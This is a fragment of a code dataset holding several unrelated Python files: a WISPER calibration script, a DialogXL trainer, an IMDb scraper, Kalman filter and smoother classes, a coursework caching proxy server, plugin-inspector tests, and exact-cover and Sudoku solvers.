pic1cal.dates2018_good) # All relevant P3 flight dates. \n path_data_dir = pic1cal.path_pic1caldir # directory with data files.\n fnames = ['WISPER_pic1cal_%s.ict' % d for d in datesall_good]\n paths_data = [path_data_dir+f for f in fnames]\n\n print(\"Checking that all WISPER 2017 and 2018 pic1-calibrated files \"\n \"exist. For any that don't, running code to get calibrated files.\") \n for i in range(len(datesall_good)):\n if os.path.isfile(paths_data[i]):\n continue\n else:\n pic1cal.calibrate_20172018_file(datesall_good[i])\n print(\"All files now exist, good to start cross-calibration fits.\")\n \"\"\" \n \n ## Fit parameters for each year:\n ##-----------------\n fitparams_2017 = get_fits_singleyear('2017', get_wisperdata('2017'))\n fitparams_2018 = get_fits_singleyear('2018', get_wisperdata('2018'))\n \n \n ## Save H2O xcal fit results to this folder:\n ##-----------------\n slope2017 = fitparams_2017['q']['h2o_tot2']\n slope2018 = fitparams_2018['q']['h2o_tot2']\n h2o_xcal_df = pd.DataFrame({'year':['2017','2018'], \n 'slope':[slope2017,slope2018]}, \n columns=['year','slope'])\n h2o_xcal_df.to_csv(\"h2o_xcal_results.csv\", index=False)\n \n\n ## Save H2O xcal fit results to this folder:\n ##-----------------\n def isoratio_xcal_to_csv(fitparams_s, fname):\n # fitparams_s: fit results as pd.Series.\n fitparams_df = pd.DataFrame({'predictor_var':fitparams_s.index,\n 'coeff':fitparams_s.values},\n columns=['predictor_var','coeff'])\n fitparams_df.to_csv(fname, index=False)\n \n isoratio_xcal_to_csv(fitparams_2017['dD'], \"dD_xcal_results_2017.csv\")\n isoratio_xcal_to_csv(fitparams_2017['d18O'], \"d18O_xcal_results_2017.csv\")\n isoratio_xcal_to_csv(fitparams_2018['dD'], \"dD_xcal_results_2018.csv\")\n isoratio_xcal_to_csv(fitparams_2018['d18O'], \"d18O_xcal_results_2018.csv\")\n \n\nif __name__ == '__main__':\n get_fits()","repo_name":"DeanHenze/WISPER_crosscal_models","sub_path":"pic2_xcal_fits.py","file_name":"pic2_xcal_fits.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71044703339","text":"import numpy as np, argparse, time, pickle, random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom sklearn.metrics import f1_score, confusion_matrix, accuracy_score, classification_report, \\\n precision_recall_fscore_support\nfrom utils import person_embed\nfrom tqdm import tqdm\n\n\ndef train_or_eval_model_for_transfo_xl(model, loss_function, dataloader, epoch, cuda, args, optimizer=None, train=False):\n '''\n\n :param model:\n :param loss_function:\n :param dataloader: list of datasets,\n :param args:\n :param optimizer:\n :param train:\n :return:\n '''\n losses, preds, labels = [], [], []\n scores, vids = [], []\n\n\n assert not train or optimizer != None\n if train:\n model.train()\n # dataloader = tqdm(dataloader)\n else:\n model.eval()\n\n for dataset in dataloader:\n mems = None\n speaker_mask = None\n window_mask = None\n # if train:\n # dataset = tqdm(dataset)\n # cnt = 0\n for data in dataset:\n if train:\n optimizer.zero_grad()\n\n # cnt += 1\n # if cnt > 4:\n # exit()\n\n # text_ids, text_feature, speaker_ids, labels, umask = [d.cuda() for d in data] if cuda else data\n content_ids, label, content_mask, content_lengths, speaker_ids,_ = data\n # print(content_ids.size())\n # print(label.size())\n # print(content_mask.size())\n # print(content_lengths.size())\n # print(content_ids.size())\n # print(speaker_ids)\n # speaker_vec = person_embed(speaker_ids, person_vec)\n if cuda:\n content_ids = content_ids.cuda()\n content_mask = content_mask.cuda()\n speaker_ids = speaker_ids.cuda()\n content_lengths = content_lengths.cuda()\n label = label.cuda()\n\n if args.basemodel == 'transfo_xl':\n logits, mems = model(content_ids, mems, content_mask)\n elif args.basemodel in ['xlnet_dialog', 'xlnet']:\n logits, mems, speaker_mask, window_mask = model(content_ids = content_ids, mems = mems, content_mask = content_mask,\n content_lengths = content_lengths, speaker_ids = speaker_ids,\n speaker_mask = speaker_mask, window_mask = window_mask)\n\n loss = loss_function(logits, label)\n # print(speaker_mask.detach().cpu().numpy())\n # print(content_lengths)\n # print(speaker_ids)\n # print('------------------------------------------------------')\n\n\n label = label.cpu().numpy().tolist()\n pred = torch.argmax(logits, 1).cpu().numpy().tolist()\n # print(label)\n # print(pred)\n for l,p in zip(label, pred):\n if l != -1:\n preds.append(p)\n labels.append(l)\n losses.append(loss.item())\n # print(content_lengths)\n # print(mems[0].size())\n\n if train:\n loss_val = loss.item()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n if args.tensorboard:\n for param in model.named_parameters():\n writer.add_histogram(param[0], param[1].grad, epoch)\n optimizer.step()\n # torch.cuda.empty_cache()\n\n if preds != []:\n preds = np.array(preds)\n labels = np.array(labels)\n else:\n return float('nan'), float('nan'), [], [], float('nan'), [], [], [], [], []\n\n # print(preds.tolist())\n # print(labels.tolist())\n avg_loss = round(np.sum(losses) / len(losses), 4)\n avg_accuracy = round(accuracy_score(labels, preds) * 100, 2)\n if args.dataset_name in ['IEMOCAP', 'MELD', 'EmoryNLP']:\n avg_fscore = round(f1_score(labels, preds, average='weighted') * 100, 2)\n else:\n avg_fscore = round(f1_score(labels, preds, average='micro', labels = list(range(1,7))) * 100, 2)\n # del mems\n # print(list(preds))\n # print(list(labels))\n\n return avg_loss, avg_accuracy, labels, preds, avg_fscore\n","repo_name":"shenwzh3/DialogXL","sub_path":"DialogXL/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"92"} +{"seq_id":"27127433905","text":"# first create venv >> and activate\r\n# pip install requests\r\n# pip install bs4\r\n# pip install html5lib\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\n\r\n# to load in the xsxl file we need to import openpyxl file and check the the no. of sheet with name \r\n\r\nexcel=openpyxl.Workbook() \r\n# print(excel.sheetnames)\r\nsheet=excel.active\r\n\r\nsheet.title ='Top rated Moives'\r\nprint(excel.sheetnames)\r\n\r\n# here we will create column name for excel\r\nsheet.append([\"Movie Rank\",\"Movie name\",\"year of Release\",\"IMDB rating\"])\r\n\r\n\r\ntry:\r\n source=requests.get('https://www.imdb.com/chart/top/')\r\n source.raise_for_status() # of the ther error 404 the if the web is present or not\r\n\r\n soup=BeautifulSoup(source.text,'html.parser')\r\n # print(soup)\r\n movies = soup.find('tbody',class_='lister-list').find_all('tr')\r\n # print(len(movies)) #250\r\n # print(movies) #this will give list\r\n\r\n for movie in movies:\r\n\r\n name=movie.find('td', class_='titleColumn').a.text\r\n # print(\"Movie_name>>>>>\",name)\r\n\r\n rank=movie.find('td',class_='titleColumn').get_text(strip=True).split('.')[0]\r\n # print(\"movie_Rank>>>>>>\",rank)\r\n\r\n year=movie.find('td',class_='titleColumn').find('span',class_=\"secondaryInfo\").text.strip('()')\r\n # print(\"Movie_year>>>>>>\",year)\r\n\r\n rating=movie.find('td',class_='ratingColumn imdbRating').strong.text\r\n # print(\"Movie_ratting>>>>>>\",rating)\r\n\r\n print(rank,name,year,rating)\r\n sheet.append([rank,name,year,rating])\r\n\r\n \r\nexcept Exception as e :\r\n print(e)\r\n\r\nexcel.save(\"IMDb top 250 movie rating.xlsx\")","repo_name":"koushilkp/IMDB_movie_rating","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17317450524","text":"'''用生成器实现reversed的功能'''\ndef myrev(string):\n if isinstance(string, str): #判断参数是否为字符串\n for x in range(len(string)-1, -1, -1): #从大到小迭代出字符串的序列号\n yield string[x]\n else:\n print('Argument in myrev() isn\\'t string')\n\nt = myrev('tomorrow morning')\nfor x in t:\n print(x, end = '')\n\n","repo_name":"sonichuang/My-py-file","sub_path":"生成器 实现reversed的方法new.py","file_name":"生成器 实现reversed的方法new.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17828050108","text":"import numpy as np\nfrom StateModel import Gaussian\nfrom itertools import tee\nfrom functools import partial\nfrom autograd import jacobian\nfrom MomentMatching import TaylorTransform\nimport logging\n\nFORMAT = \"[ %(funcName)10s() ] %(message)s\"\n\nlogging.basicConfig(filename='kalman_filter.log', level=logging.FATAL, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\ndef pairwise(x):\n node, next_node = tee(x)\n next(node, None)\n yield zip(node, next_node)\n\n\nclass KalmanFilterSmoother:\n \"\"\"\n Implementation of nonlinear Gaussian filter/smoother.\n \"\"\"\n def __init__(self, moment_matching, system_model, meas_moment_matching=None):\n\n self.transform = moment_matching\n\n if meas_moment_matching is None:\n self.meas_transform = moment_matching\n else:\n self.meas_transform = meas_moment_matching\n self.transition = system_model.transition\n self.measurement = system_model.measurement\n self.transition_noise = system_model.system_noise.cov\n self.measurement_noise = system_model.measurement_noise.cov\n self.init_state = system_model.init_state\n self.dt = system_model.dt\n\n def predict(self, prior_state, t=None, u=None, *args, **kwargs):\n func = partial(self.transition, t=t, u=u)\n xx_mean, xx_cov, _ = self.transform(func, prior_state)\n xx_cov += self.transition_noise\n return Gaussian(xx_mean, xx_cov)\n\n def correct(self, state, meas, t=None, u=None, *args, **kwargs):\n func = partial(self.measurement, t=t, u=u)\n z_mean, z_cov, xz_cross_cov = \\\n self.meas_transform(func, state)\n\n z_cov += self.measurement_noise\n\n kalman_gain = np.linalg.solve(z_cov, xz_cross_cov.T).T\n meas = np.atleast_1d(meas)\n mean = state.mean + np.dot(kalman_gain, (meas - z_mean)) # equation 15 in Marc's ACC paper\n cov = state.cov - np.dot(kalman_gain, np.transpose(xz_cross_cov))\n\n return Gaussian(mean, cov)\n\n def smooth(self, state, next_state, t=None, u=None, *args, **kwargs):\n func = partial(self.transition, t=t, u=u)\n xx_mean, xx_cov, xx_cross_cov = self.transform(func, state)\n\n xx_cov += self.transition_noise\n\n J = np.linalg.solve(xx_cov, xx_cross_cov.T).T\n mean = state.mean + np.dot(J, (next_state.mean - xx_mean))\n cov = state.cov + J @ (next_state.cov - xx_cov) @ J.T\n\n return Gaussian(mean, cov)\n\n def kalman_filter(self, measurements, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n\n if prior_state is None:\n prior_state = self.init_state\n\n state = prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self.correct(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n def kalman_smoother(self, filtered_list, u=None, *args, **kwargs):\n reversed_filtered = reversed(filtered_list)\n N = len(filtered_list)\n t = (N-1) * self.dt\n\n result = []\n\n next_state = next(reversed_filtered).copy()\n result.append(next_state)\n for state in reversed_filtered:\n smoothed_state = self.smooth(state, next_state, t=t, u=u, *args, **kwargs)\n result.append(smoothed_state)\n next_state = smoothed_state.copy()\n t -= self.dt\n\n return list(reversed(result))\n\n\nclass IEKF(KalmanFilterSmoother):\n \"\"\"\n Implementation of the iterated Extended Kalman Filter in\n Bell and Cathey (1993) \"The Iterated Kalman Filter Update as a Gauss-Newton Method.\"\n \"\"\"\n def __init__(self, system_model, sys_dim):\n transform = TaylorTransform(dim=sys_dim)\n super().__init__(transform, system_model)\n\n def _iterated_update(self, state, meas, t=None, u=None, *args, **kwargs):\n x = state.mean\n P = state.cov\n for i in range(self.num_iter):\n h_i = self.measurement(state.mean, t, u)[0]\n H_i = jacobian(self.measurement, argnum=0)(state.mean, t, u)[0]\n z_mean = h_i - H_i @ (x - state.mean)\n z_cov = H_i @ P @ H_i.T + self.measurement_noise\n xz_cross_cov = P @ H_i.T\n\n kalman_gain = np.linalg.solve(z_cov, xz_cross_cov.T).T\n meas = np.atleast_1d(meas)\n mean = x + np.dot(kalman_gain, (meas - z_mean)) # equation 15 in Marc's ACC paper\n cov = P - np.dot(kalman_gain, np.transpose(xz_cross_cov))\n\n state = Gaussian(mean, cov)\n\n return state\n\n def __call__(self, measurements, num_iter=5, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n self.num_iter = num_iter\n if prior_state is None:\n prior_state = self.init_state\n\n state = prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self._iterated_update(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n\nclass IEKS(KalmanFilterSmoother):\n \"\"\"\n Implementation of the iterated Extended Kalman Smoother in\n Bell (1994) \"The iterated Kalman smoother as a Gauss-Newton method.\"\n \"\"\"\n def __init__(self, system_model, sys_dim):\n transform = TaylorTransform(dim=sys_dim)\n super().__init__(transform, system_model)\n self.f = system_model.transition\n self.h = system_model.measurement\n self.Df = jacobian(system_model.transition, argnum=0)\n self.Dh = jacobian(system_model.measurement, argnum=0)\n\n @staticmethod\n def _linearise(func, Df, x0):\n return lambda x, t, u: func(x0, t=t, u=u) + Df(x0, t=t, u=u) @ (x - x0)\n\n def _kalman_filter(self, measurements, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n\n if prior_state is None:\n prior_state = self.init_state\n\n state = prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n self.transition = self.f_list[i]\n self.measurement = self.h_list[i]\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self.correct(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n def _kalman_smoother(self, filtered_list, u=None, *args, **kwargs):\n reversed_filtered = reversed(filtered_list)\n N = len(filtered_list)\n t = (N-1) * self.dt\n\n result = []\n\n next_state = next(reversed_filtered).copy()\n result.append(next_state)\n i = len(filtered_list)-1\n for state in reversed_filtered:\n self.transition = self.f_list[i]\n smoothed_state = self.smooth(state, next_state, t=t, u=u, *args, **kwargs)\n result.append(smoothed_state)\n next_state = smoothed_state.copy()\n t -= self.dt\n i -= 1\n\n return list(reversed(result))\n\n def __call__(self, measurements, num_iter=5):\n # self.f_list = [self._linearise(self.f, self.Df, self.init_state.mean) for _ in measurements]\n # self.h_list = [self._linearise(self.h, self.Dh, self.init_state.mean) for _ in measurements]\n\n # First iteration\n filter_results = self.kalman_filter(measurements)\n smoother_results = self.kalman_smoother(filter_results)\n\n self.f_list = [self._linearise(self.f, self.Df, state.mean) for state in smoother_results]\n self.h_list = [self._linearise(self.h, self.Dh, state.mean) for state in smoother_results]\n\n for k in range(num_iter-1):\n\n # print(f'iteration: {k+1}/{num_iter}')\n filter_results = self._kalman_filter(measurements)\n smoother_results = self._kalman_smoother(filter_results)\n\n # Update linearisation points\n self.f_list = [self._linearise(self.f, self.Df, state.mean) for state in smoother_results]\n self.h_list = [self._linearise(self.h, self.Dh, state.mean) for state in smoother_results]\n \n return smoother_results","repo_name":"sanket-kamthe/EPyStateEstimator","sub_path":"Filters/KalmanFilter.py","file_name":"KalmanFilter.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"} +{"seq_id":"69952433259","text":"from socket import *\r\nimport sys\r\nimport time\r\nfrom _thread import*\r\n\r\nif len(sys.argv) <= 1:\r\n\tprint('Usage : \"python ProxyServer.py server_ip\"\\n[server_ip : It is the IP Address Of Proxy Server & Web server.')\r\n\tsys.exit(2)\r\n# Environment : Python 3.8\r\n# Create a server socket, bind it to a port and start listening\r\ntcpSerSock = socket(AF_INET, SOCK_STREAM)\r\n# Fill in start.\r\ntcpSerSock.bind(('', 65432))\r\ntcpSerSock.listen(5)\r\n# Fill in end.\r\ndef routine(tcpCliSock):\r\n\t# Strat receiving data from the client\r\n\tmessage = tcpCliSock.recv(1024).decode()\r\n\tprint(message)\r\n\t# Extract the filename from the given message\r\n\tprint(message.split()[1])\r\n\tfilename = message.split()[1].partition(\"/\")[2]\r\n\tprint(filename)\r\n\tfileExist = \"false\"\r\n\tfiletouse = \"/\" + filename\r\n\tprint(filetouse)\r\n\ttry:\r\n\t\t# Check wether the file exist in the cache\r\n\t\tf = open(filetouse[1:], \"r\")\r\n\t\toutputdata = f.read()\r\n\t\tfileExist = \"true\"\r\n\t\t# ProxyServer finds a cache hit and generates a response message\r\n\t\t\r\n\t\t# Fill in start.\r\n\t\tfor data in outputdata:\r\n\t\t\t\ttcpCliSock.send(data.encode())\r\n\t\t# Fill in end.\r\n\t\tprint('Read from cache')\r\n\t# Error handling for file not found in cache\r\n\texcept IOError:\r\n\t\tif fileExist == \"false\":\r\n\t\t\t# Create a socket on the proxyserver\r\n\t\t\tc = socket(AF_INET, SOCK_STREAM)\r\n\t\t\ttry:\r\n\t\t\t\t# Connect to the socket to port 80\r\n\t\t\t\thostname = filename.replace(\"www.\",\"\",1)\r\n\t\t\t\tc.connect((hostname, 80))\r\n\t\t\t\t# ask port 127.0.0.1:80 for the file requested by the client\r\n\t\t\t\trequest =\"GET \"+\" http://\" + filename + \" HTTP/1.0\\n\\n\" + \"Host: \" + hostname +\"\\n\\n\"\r\n\t\t\t\tc.send(request.encode())\r\n\t\t\t\t# receive the response \r\n\t\t\t\t# Fill in start.\r\n\t\t\t\thtml_file = c.recv(1024)\r\n\t\t\t\t# Fill in end.\r\n\t\t\t\t# Create a new file in the cache for the requested file.\r\n\t\t\t\t# Also send the response in the buffer to client socket and the corresponding file in the cache\r\n\t\t\t\ttmpFile = open(\"./\" + filename,\"wb\")\r\n\t\t\t\t# Fill in start.\r\n\t\t\t\ttmpFile.write(html_file)\r\n\t\t\t\ttmpFile.close()\r\n\t\t\t\ttmpFile = open(\"./\" + filename,\"rb\")\r\n\t\t\t\toutputdata = tmpFile.read()\r\n\t\t\t\ttcpCliSock.send(outputdata)\r\n\t\t\t\t# Fill in end.\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Illegal request\")\r\n\t\t\tc.close()\r\n\t\telse:\r\n\t\t\t# HTTP response message for file not found\r\n\t\t\t# Fill in start.\r\n\t\t\ttcpCliSock.send(\"HTTP/1.1 404 Not Found\\r\\n\".encode())\r\n\t\t\t# Fill in end.\r\n\t# Close the client and the server sockets. For testing multi-user, you should comment the tcpCliSock.close()\r\n\t#tcpCliSock.close()\r\n\r\n# Fill in start. Change this part, such that multi-users can connect to this proxy server\r\nwhile True:\r\n\tprint('Ready to serve...')\r\n\ttcpCliSock, addr = tcpSerSock.accept()\r\n\tprint('Received a connection from:', addr)\r\n\tstart_new_thread(routine,(tcpCliSock,))\r\ntcpSerSock.close()\r\n# Fill in end\r\n","repo_name":"Chia-Hung0/Computer-Network-2020spring","sub_path":"HW1/src/p2_b/proxy_server.py","file_name":"proxy_server.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5320618117","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport unittest\n\nimport sys\nfrom rspub.util import plugg\n\n\nclass TestInspector(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n def test_nothing(self):\n pass\n\n def test_application_home(self):\n application_home = plugg.APPLICATION_HOME\n self.assertTrue(application_home.endswith(\"rspub-core\"))\n\n def test_list_py_files_with_me(self):\n me = os.path.basename(__file__)\n found_myself = False\n for py_file in plugg.Inspector.list_py_files(\".\"):\n if py_file.endswith(me):\n found_myself = True\n break\n self.assertTrue(found_myself, \"Could not find %s in a py-file search from %s\" % (me, plugg.APPLICATION_HOME))\n\n def test_list_classes(self):\n me = self.__class__\n found_myself = False\n inspector = plugg.Inspector(stop_on_error=True)\n for cls in inspector.list_classes(plugg.APPLICATION_HOME):\n if cls == me:\n found_myself = True\n break\n self.assertTrue(found_myself, \"Could not find %s in a classes search from %s\" % (me, plugg.APPLICATION_HOME))\n\n # def test_list_py_files(self):\n # user_home = os.path.expanduser(\"~\")\n # for py_file in plugg.Inspector.list_py_files(\"rspub/util\", os.path.join(user_home, \"tmp\")):\n # print(py_file)\n #\n # def test_list_py_files_with_empty_string(self):\n # # searches APPLICATION_HOME\n # for py_file in plugg.Inspector.list_py_files(\"\"):\n # print(py_file)\n\n # def test_list_py_files_with_empty_None(self):\n # # searches APPLICATION_HOME\n # for py_file in plugg.Inspector.list_py_files(None):\n # print(py_file)\n #\n # def test_load_modules(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # user_home = os.path.expanduser(\"~\")\n # for module in inspector.load_modules(\"plugins\", os.path.join(user_home, \"tmp\")):\n # print(module)\n #\n # def test_list_classes_filtered(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # fs = [lambda cls: plugg.is_named(\"NameFilter\"),\n # plugg.from_module(\"py_test.filters\")]\n # directories = [\"plugins\", os.path.join(os.path.expanduser(\"~\"), \"tmp\")]\n # for cls in inspector.list_classes_filtered(fs, *directories):\n # print(cls)\n #\n # print (\"===================no filter\")\n # for cls in inspector.list_classes_filtered(None, *directories):\n # print(cls)\n #\n # def test_list_classes_filtered2(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # is_named = lambda cls: cls.__name__ == \"NameFilter\"\n # from_module = lambda cls: cls.__module__.startswith(\"py_test\")\n #\n # fs = [nor_(is_named, from_module)\n #\n # ]\n #\n # directories = [\"plugins\", os.path.join(os.path.expanduser(\"~\"), \"tmp\")]\n #\n # for clazz in inspector.list_classes_filtered(fs, *directories):\n # print(clazz)\n\n\n\n\n\n","repo_name":"EHRI/rspub-core","sub_path":"rspub/util/test/test_plugg.py","file_name":"test_plugg.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"7415942506","text":"import sys\n\ninput = sys.stdin.readline\nl = list(range(10000 * 2 + 1))\nfor i in range(2, 10000 * 2 + 1):\n\tfor j in range(2, -(-len(l)//i)):\n\t\tl[i * j] = 0\nn = int(input())\nfor _ in range(n):\n\ta = int(input())\n\ti = 0\n\twhile not (l[a//2-i] and l[a//2+i]):\n\t\ti += 1\n\tprint(a//2-i, a//2+i)","repo_name":"mtak0235/helloPython","sub_path":"StepByStep/기본수학2/donghyun/9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"4101060882","text":"from collections import defaultdict\n\n\ndef to_string(entries):\n s = []\n for i in xrange(9):\n for j in xrange(9):\n s.append(str(entries[i][j]))\n return ''.join(s)\n\n\ndef parse(digits):\n M = [[0]*9 for _ in xrange(9)]\n for (i, d) in enumerate(digits):\n M[i//9][i % 9] = int(d)\n return M\n\n\ndef algorithmx(target, sets):\n solution = []\n\n Y = {}\n for i in xrange(len(sets)):\n Y[i] = list(sets[i])\n\n X = {j: set() for j in target}\n for i in Y:\n for j in Y[i]:\n X[j].add(i)\n\n def solve():\n if not X:\n yield [sets[i] for i in solution]\n else:\n c = min(X, key=lambda c: len(X[c]))\n\n for r in list(X[c]):\n solution.append(r)\n\n cols = []\n for j in Y[r]:\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].remove(i)\n cols.append(X.pop(j))\n\n for s in solve():\n yield s\n\n for j in reversed(Y[r]):\n X[j] = cols.pop()\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].add(i)\n\n solution.pop()\n\n return solve()\n\n\ndef algorithm_dlx(target, sets):\n solution = []\n\n Y = {}\n for i in xrange(len(sets)):\n Y[i] = list(sets[i])\n\n X = {j: set() for j in target}\n for i in Y:\n for j in Y[i]:\n X[j].add(i)\n\n def solve():\n if not X:\n yield [sets[i] for i in solution]\n else:\n c = min(X, key=lambda c: len(X[c]))\n\n for r in list(X[c]):\n solution.append(r)\n\n cols = []\n for j in Y[r]:\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].remove(i)\n cols.append(X.pop(j))\n\n for s in solve():\n yield s\n\n for j in reversed(Y[r]):\n X[j] = cols.pop()\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].add(i)\n\n solution.pop()\n\n return solve()\n\n\nclass ExactCover(object):\n \"\"\"\n Class representing the Exact Cover problem.\n\n Given a collection S of subsets of the set X, does there exist a\n subcollection S' such that every element of X is contained in exactly one\n member of S'?\n \"\"\"\n def __init__(self, sets):\n self.sets = sets.copy()\n universe = set()\n\n for (key, value) in sets.iteritems():\n universe.update(value)\n\n self.universe = universe\n self.num_cols = len(universe)\n\n def __repr__(self):\n return \"Exact Cover Problem\"\n\n\nclass ExactCoverBinary(ExactCover):\n \"\"\"\n Class representing the Exact Cover problem.\n\n Given a matrix M with entries of 0 and 1, does there exist a subset of the\n rows of M which sum to the vector of all 1s?\n \"\"\"\n def __init__(self, integers):\n vectors = defaultdict(list)\n num_bits = 0\n\n for n in integers:\n least_set_bit = n & (-n)\n num_bits = max(num_bits, n.bit_length())\n vectors[least_set_bit].append(n)\n\n self.vectors = vectors\n self.num_bits = num_bits\n\n def number_of_solutions(self):\n \"\"\"\n Returns the number of exact covers. The algorithm is a memoized\n recursive backtracking method.\n \"\"\"\n vectors = self.vectors\n all_bits = 2**self.num_bits - 1\n cache = {all_bits: 1}\n\n def backtrack(covered):\n if covered in cache:\n return cache[covered]\n\n total = 0\n least_unset_bit = ~covered & (covered + 1)\n for v in vectors[least_unset_bit]:\n if (covered & v) == 0:\n total += backtrack(covered | v)\n\n cache[covered] = total\n return total\n\n total = backtrack(0)\n return total\n\n def solutions(self):\n all_bits = 2**self.num_bits - 1\n vectors = self.vectors\n stack = [(0, [])]\n\n while stack:\n (covered, used) = stack.pop()\n if covered == all_bits:\n yield used\n else:\n least_unset_bit = ~covered & (covered + 1)\n for v in vectors[least_unset_bit]:\n if (covered & v) == 0:\n stack.append((covered | v, used + [v]))\n\n\ndef langford_ints(n):\n L = []\n for p in xrange(1, n + 1):\n c = 1 << (3*n - p)\n l = 2*n - 1\n r = l - p - 1\n while r >= 0:\n b = c | (1 << l)\n b |= (1 << r)\n L.append(b)\n r -= 1\n l -= 1\n return L\n\n\ndef langford_pairings(n):\n ints = langford_ints(n)\n E = ExactCoverBinary(ints)\n num_sols = E.number_of_solutions()\n return num_sols // 2\n\n\ndef domino_ints(n):\n L = []\n for i in xrange(n*n):\n if i + n < n*n:\n L.append((1 << i) | (1 << (i + n)))\n\n if i + 1 < n*n and (i + 1) % n != 0:\n L.append((1 << i) | (1 << (i + 1)))\n\n return L\n\n\ndef domino_tilings(n):\n ints = domino_ints(n)\n E = ExactCoverBinary(ints)\n num_sols = E.number_of_solutions()\n return num_sols\n\n\ndef latin_square_ints(n):\n ints = []\n all_blocks = {}\n for i in xrange(n):\n all_blocks[i] = []\n for j in xrange(n):\n blocks = [[0]*n for _ in xrange(n)]\n blocks[j][i] = 1\n all_blocks[i].append(blocks)\n\n for p in xrange(n):\n for (i, a) in enumerate(all_blocks[p]):\n for (j, b) in enumerate(all_blocks[p]):\n t = []\n for s in a + b:\n t.extend(s)\n val = sum(2**(2*n*n - k - 1) for k in xrange(2*n*n) if t[k])\n ints.append((val << (n*n)) | (1 << (n*n - j*n - i - 1)))\n\n return ints\n\n\ndef sudoku_vectors(M):\n vectors = []\n block_idx = {\n (0, 0): 0,\n (0, 3): 1,\n (0, 6): 2,\n (3, 0): 3,\n (3, 3): 4,\n (3, 6): 5,\n (6, 0): 6,\n (6, 3): 7,\n (6, 6): 8\n }\n\n for row in range(9):\n for col in range(9):\n if M[row][col] == 0:\n digits = range(1, 10)\n else:\n digits = [M[row][col]]\n\n for digit in digits:\n entries = set()\n entries.add(\"{}O{}\".format(row, col))\n entries.add(\"{}R{}\".format(digit, row))\n entries.add(\"{}C{}\".format(digit, col))\n\n rr = row - (row % 3)\n cc = col - (col % 3)\n entries.add(\"{}B{}\".format(digit, block_idx[rr, cc]))\n\n vectors.append(entries)\n\n return vectors\n\n\ndef sudoku_dlx(a):\n M = parse(a)\n vecs = sudoku_vectors(M)\n target = set()\n for e in vecs:\n target.update(e)\n\n sol = algorithmx(target, vecs).next()\n\n for entry in sol:\n for e in entry:\n if e[1] == 'O':\n r = int(e[0])\n c = int(e[2])\n\n if e[1] == 'C':\n d = int(e[0])\n\n M[r][c] = d\n\n return to_string(M)\n","repo_name":"siegelzero/rosemary","sub_path":"rosemary/combinatorics/optimization/exact_cover.py","file_name":"exact_cover.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"8404616957","text":"from collections import Counter, defaultdict\nfrom itertools import groupby, product\n\nfrom devito.ir.clusters import Cluster, ClusterGroup, Queue\nfrom devito.ir.support import TILABLE, SEQUENTIAL, Scope\nfrom devito.passes.clusters.utils import cluster_pass\nfrom 